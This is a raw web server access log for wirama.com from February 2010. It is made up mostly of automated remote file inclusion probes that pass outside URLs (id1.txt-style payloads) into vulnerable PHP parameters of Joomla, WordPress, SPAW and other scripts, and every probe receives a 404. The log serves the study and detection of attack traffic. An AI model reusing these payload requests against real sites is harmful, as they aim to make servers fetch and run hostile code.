77.221.130.15 - - [01/Feb/2010:03:16:23 -0800] "GET /logs/access_090329.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:16:30 -0800] "GET /logs/access_090329.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:16:37 -0800] "GET /logs/access_091001.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:16:44 -0800] "GET /logs/access_091001.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:16:44 -0800] "GET /logs/access_091001.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.94.194.248 - - [01/Feb/2010:03:18:30 -0800] "GET /components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.94.194.248 - - [01/Feb/2010:03:18:30 -0800] "GET /logs/access_091031.log//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.94.194.248 - - [01/Feb/2010:03:18:30 -0800] "GET /logs//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.94.194.248 - - [01/Feb/2010:03:18:30 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:20:29 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:20:29 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:20:29 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.94.194.248 - - [01/Feb/2010:03:20:30 -0800] "GET /logs/access_090329.log//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.98.23.9 - - [01/Feb/2010:03:20:37 -0800] "GET /logs/access_090701.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.94.194.248 - - [01/Feb/2010:03:21:38 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:23:17 -0800] "GET /logs/access_090801.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:23:27 -0800] "GET /logs/access_090801.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:23:36 -0800] "GET /logs/access_090801.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.125 - - [01/Feb/2010:03:24:08 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
194.110.160.78 - - [01/Feb/2010:03:24:09 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:03:24:09 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:03:24:09 -0800] "GET /logs/access_090801.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:03:24:24 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:03:24:24 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:03:24:24 -0800] "GET /logs/access_091031.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:03:25:02 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:03:25:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:03:25:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:03:25:47 -0800] "GET /logs/access_090329.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:26:19 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:26:19 -0800] "GET /logs/access_090801.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:26:19 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:27:27 -0800] "GET /logs/access_090329.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.221.91.55 - - [01/Feb/2010:03:29:00 -0800] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
66.221.91.55 - - [01/Feb/2010:03:29:00 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
66.221.91.55 - - [01/Feb/2010:03:29:00 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
66.221.91.55 - - [01/Feb/2010:03:30:09 -0800] "GET /logs/access_090401.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:47 -0800] "GET /logs/access_090331.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:47 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:47 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:48 -0800] "GET /logs/access_090331.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:48 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:48 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:54 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:54 -0800] "GET /logs/access_090331.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:54 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:59 -0800] "GET /logs/access_090331.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:30:59 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:31:00 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:31:44 -0800] "GET /logs/access_090401.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:31:48 -0800] "GET /logs/access_090401.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:32:23 -0800] "GET /logs/access_091101.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:32:29 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:32:29 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:32:29 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:03:32:34 -0800] "GET /logs/access_091101.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:03:32:38 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:03:32:38 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:03:32:38 -0800] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:32:42 -0800] "GET /logs/access_090701.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
66.221.91.55 - - [01/Feb/2010:03:32:45 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.221.91.55 - - [01/Feb/2010:03:32:45 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.221.91.55 - - [01/Feb/2010:03:32:45 -0800] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.174.53 - - [01/Feb/2010:03:32:52 -0800] "GET //vwar/backup/errors.php?error=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.174.53 - - [01/Feb/2010:03:32:52 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.174.53 - - [01/Feb/2010:03:32:52 -0800] "GET /logs/access_090329.log///vwar/backup/errors.php?error=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:03:33:35 -0800] "GET /logs/access_090401.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.138.32.230 - - [01/Feb/2010:03:33:48 -0800] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.138.32.230 - - [01/Feb/2010:03:33:48 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.138.32.230 - - [01/Feb/2010:03:33:48 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.138.32.230 - - [01/Feb/2010:03:34:14 -0800] "GET /logs/access_090401.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
66.221.91.55 - - [01/Feb/2010:03:34:48 -0800] "GET /logs/access_090329.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:36:10 -0800] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:36:45 -0800] "GET /logs/access_090329.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:03:36:48 -0800] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:03:37:58 -0800] "GET /logs/access_090329.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:03 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:03 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:03 -0800] "GET /logs/access_090329.log%20%20//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:08 -0800] "GET /logs/access_090329.log%20%20//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:08 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:08 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:18 -0800] "GET /logs/access_090801.log%20%20//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:03:40:22 -0800] "GET /logs/access_090801.log%20%20//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.138.32.230 - - [01/Feb/2010:03:40:28 -0800] "GET /logs/access_090330.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:03:41:34 -0800] "GET /logs/access_090330.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:03:46:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:03:46:19 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:03:46:20 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
95.108.150.235 - - [01/Feb/2010:03:46:20 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:03:46:23 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
95.108.150.235 - - [01/Feb/2010:03:46:26 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
66.221.91.55 - - [01/Feb/2010:03:46:38 -0800] "GET /logs/access_090330.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.155 - - [01/Feb/2010:03:47:20 -0800] "GET /logs/access_090330.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:03:47:20 -0800] "GET /logs/access_090331.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:03:47:20 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:03:47:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:03:48:31 -0800] "GET /logs/access_090330.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.155 - - [01/Feb/2010:03:48:31 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.155 - - [01/Feb/2010:03:48:31 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.240.36.36 - - [01/Feb/2010:03:49:22 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:03:49:22 -0800] "GET /logs/access_090331.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:03:49:22 -0800] "GET /logs/access_090330.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:03:49:22 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:03:50:06 -0800] "GET /logs/access_090330.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.240.36.36 - - [01/Feb/2010:03:50:06 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.240.36.36 - - [01/Feb/2010:03:50:06 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.155 - - [01/Feb/2010:03:50:07 -0800] "GET /logs/access_090329.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:05 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:06 -0800] "GET /logs/access_090329.log%20%20////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:06 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:06 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:06 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:07 -0800] "GET /logs/access_090329.log%20%20////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:07 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:13 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:13 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:14 -0800] "GET /logs/access_090329.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:14 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:14 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:03:53:17 -0800] "GET /logs/access_090801.log%20%20////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
